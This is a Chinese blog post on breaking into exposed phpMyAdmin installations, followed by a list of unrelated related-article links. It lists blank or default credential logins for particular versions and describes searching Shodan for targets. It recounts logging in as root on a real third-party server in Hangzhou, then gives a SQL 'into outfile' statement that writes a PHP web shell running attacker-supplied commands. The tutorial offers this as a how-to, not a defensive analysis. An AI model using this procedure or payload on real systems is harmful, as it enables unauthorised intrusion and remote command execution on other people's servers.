phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
用PHP实现登陆验证码(类似条行码状)
Oct 09 PHP
PHP读取目录下所有文件的代码
Jan 07 PHP
Discuz! Passport 通行证整合
Mar 27 PHP
PHP中date()日期函数有关参数整理
Jul 19 PHP
PHP投票系统防刷票判断流程分析
Feb 04 PHP
浅析php变量作用域的一些问题
Aug 08 PHP
PHP的Laravel框架结合MySQL与Redis数据库的使用部署
Mar 21 PHP
Yii净化器CHtmlPurifier用法示例(过滤不良代码)
Jul 15 PHP
php简单中奖算法(实例)
Aug 15 PHP
Laravel 5.5基于内置的Auth模块实现前后台登陆详解
Dec 21 PHP
PHP unlink与rmdir删除目录及目录下所有文件实例代码
Feb 07 PHP
php实现JWT验证的实例教程
Nov 26 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
PHP 只允许指定IP访问(允许*号通配符过滤IP)
2014/07/08 PHP
php实现在线通讯录功能(附源码)
2016/05/13 PHP
PHP 实现 JSON 数据的编码和解码操作详解
2020/04/22 PHP
使用JavaScript库还是自己写代码?
2010/01/28 Javascript
JavaScript对象之间的转换 jQuery对象和原声DOM
2011/03/07 Javascript
原生js实现复制对象、扩展对象 类似jquery中的extend()方法
2014/08/30 Javascript
JS中三目运算符和if else的区别分析与示例
2014/11/21 Javascript
js获取当前日期时间及其它日期操作汇总
2016/03/08 Javascript
js和jQuery设置Opacity半透明 兼容IE6
2016/05/24 Javascript
表单input项使用label同时引用Bootstrap库导致input点击效果区增大问题
2016/10/11 Javascript
javascript判断回文数详解及实现代码
2017/02/03 Javascript
Three.js利用Detector.js插件如何实现兼容性检测详解
2017/09/26 Javascript
浅谈webpack打包过程中因为图片的路径导致的问题
2018/02/21 Javascript
JavaScript中创建原子的方法总结
2018/08/26 Javascript
对类Vue的MVVM前端库的实现代码
2018/09/07 Javascript
详解如何创建并发布一个 vue 组件
2018/11/08 Javascript
vue 表单验证按钮事件交由父组件触发的方法
2018/12/17 Javascript
js控制随机数生成概率代码实例
2019/03/21 Javascript
vue-cli的build的文件夹下没有dev-server.js文件配置mock数据的方法
2019/04/17 Javascript
VueJs里利用CryptoJs实现加密及解密的方法示例
2019/04/29 Javascript
解决vue项目中某一页面不想引用公共组件app.vue的问题
2020/08/14 Javascript
python爬虫入门教程之糗百图片爬虫代码分享
2014/09/02 Python
利用python3随机生成中文字符的实现方法
2017/11/24 Python
Python爬虫设置代理IP的方法(爬虫技巧)
2018/03/04 Python
Python3 xml.etree.ElementTree支持的XPath语法详解
2020/03/06 Python
python 如何读、写、解析CSV文件
2021/03/03 Python
app内嵌H5 webview 本地缓存问题的解决
2020/10/19 HTML / CSS
英语专业毕业生自我鉴定
2013/11/09 职场文书
学前教育毕业生自荐信范文
2013/12/24 职场文书
校园达人秀策划书
2014/01/12 职场文书
自动化专业职业生涯规划书范文
2014/01/16 职场文书
公务员政审个人鉴定
2014/02/25 职场文书
个园导游词
2015/02/04 职场文书
技术员个人工作总结
2015/03/03 职场文书
活动总结模板大全
2015/05/11 职场文书
【海涛解说】史上最给力比赛,挑战DOTA极限
2022/04/01 DOTA